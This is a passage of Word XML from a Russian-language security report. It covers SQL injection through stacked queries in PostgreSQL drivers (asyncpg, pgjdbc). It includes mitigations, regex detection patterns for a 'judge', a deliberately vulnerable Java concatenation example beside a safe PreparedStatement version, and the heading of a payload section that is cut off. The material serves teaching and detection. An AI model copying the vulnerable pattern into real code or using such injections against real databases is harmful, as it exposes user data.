    <w:p w14:paraId="2BC905B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigations специфичные для драйвера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EBE96F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.execute(sql, *args)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.fetch(sql, *args)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-placeholders. Если args не нужны (SELECT-константа) — всё равно безопасно, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>только потому, что в SQL нет пользовательского ввода</w:t>
      </w:r>
      <w:r>
        <w:t>; конкатенация в такой запрос уязвима.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A671F84" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для no-args запросов с пользовательским вводом нет — либо переписать на параметризацию, либо использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>await conn.prepare(sql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> явно, что принудительно переведёт запрос в extended-протокол и заблокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7130DCC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   Для динамических identifiers — predefined whitelist (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if table_name not in ALLOWED: raise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), потом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>str.format()</w:t>
      </w:r>
      <w:r>
        <w:t>. Никаких asyncpg-utils в стандартной поставке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A927F41" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для multi-statement миграций (legitimate use case) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn.execute()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>';'.join(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в transaction-блоке: оставить как явный административный путь, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не вызывать из обработчиков HTTP-запросов</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6128CD08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   В коде судьи: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn\.(fetch|execute|fetchrow|fetchval)\(f"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn\.(fetch|execute|fetchrow|fetchval)\(".*\+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>conn\.(fetch|execute|fetchrow|fetchval)\(".*%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754EA5D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653C0AB5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">asyncpg ≥ 0.18 (2018) — поведение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с args/без стабильное на всей истории. Актуальная 0.30.x. SQLAlchemy 2.x с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asyncpg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-dialect использует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>connection.fetch()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> под капотом — поведение наследуется (см. также 3.5.2 — психология та же, что для psycopg3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B739C31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BE6DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   asyncpg docs: «Basic Usage» — https://magicstack.github.io/asyncpg/current/usage.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E143E57" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   asyncpg API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Connection.prepare()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://magicstack.github.io/asyncpg/current/api/index.html#asyncpg.connection.Connection.prepare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A88732" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   asyncpg issue #30 (поведение multi-statement) — https://github.com/MagicStack/asyncpg/issues/30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715738BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R20 (sources/research.md, строка 334)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A28B7FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.5.4 pgjdbc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4726BB7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Setup.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pgjdbc (актуальная ветка 42.7.x) — официальный JDBC-драйвер PostgreSQL. JDBC-API делит исполнение SQL на два класса: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`Statement`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (raw SQL без параметров) и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`PreparedStatement`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SQL с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-placeholders + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setXxx()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-вызовами для значений). Pgjdbc дополнительно управляет wire-протоколом через connection-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extended</w:t>
      </w:r>
      <w:r>
        <w:t>). Комбинации:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F30000" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement.execute(sql)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — всегда </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>simple query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, независимо от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:t>. Стакинг проходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C53E12F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=extended</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (default) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extended protocol</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Parse/Bind/Execute). Стакинг блокирован сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F2921B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — pgjdbc эмулирует параметризацию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>client-side</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (substitution с экранированием), отправляет через simple-protocol. Стакинг через значение параметра блокирован экранированием, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри SQL-текста (не через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>) — проходит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDBDAF7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Кроме </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, есть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prepareThreshold</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (default 5) — после N исполнений </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> становится server-side prepared statement; для нашей темы не меняет ничего, потому что extended-режим уже на первом исполнении.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C28AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45611A63" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String name = request.getParameter("name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E21F4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement stmt = conn.createStatement();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA96D40" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResultSet rs = stmt.executeQuery(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D10166" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = '" + name + "'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F7508" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement.executeQuery()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не имеет фазы Bind — pgjdbc отправляет строку как simple query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A9789D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55850E87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String name = request.getParameter("name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8B35AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement ps = conn.prepareStatement(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3396DF27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFBA2BA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ps.setString(1, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E7EF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ResultSet rs = ps.executeQuery();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079381F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setString()</w:t>
      </w:r>
      <w:r>
        <w:t>. По умолчанию (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>preferQueryMode=extended</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) уходит через Parse/Bind/Execute, значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> приходит на сервер как Bind-аргумент.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556AE33D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C7D2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `name`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7AA494"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12087FF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Путь 1: Statement.execute() — simple, всегда уязвим.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B21B633" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
